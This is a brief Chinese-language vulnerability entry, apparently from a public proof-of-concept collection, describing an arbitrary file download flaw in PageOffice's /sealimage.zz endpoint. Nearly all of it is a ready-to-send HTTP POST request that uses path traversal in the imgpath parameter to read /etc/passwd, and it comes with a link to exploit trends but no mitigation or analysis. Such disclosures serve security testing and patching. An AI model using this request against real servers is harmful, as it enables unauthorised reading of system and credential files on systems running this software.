PageOffice /sealimage.zz 文件读取漏洞

2025-09-19 PageOffice PoC Public

Description

PageOffice 存在任意文件下载漏洞

PoC

POST /sealimage.zz?imgtype=*/*&imgpath=../../../../../../../../../etc/passwd HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities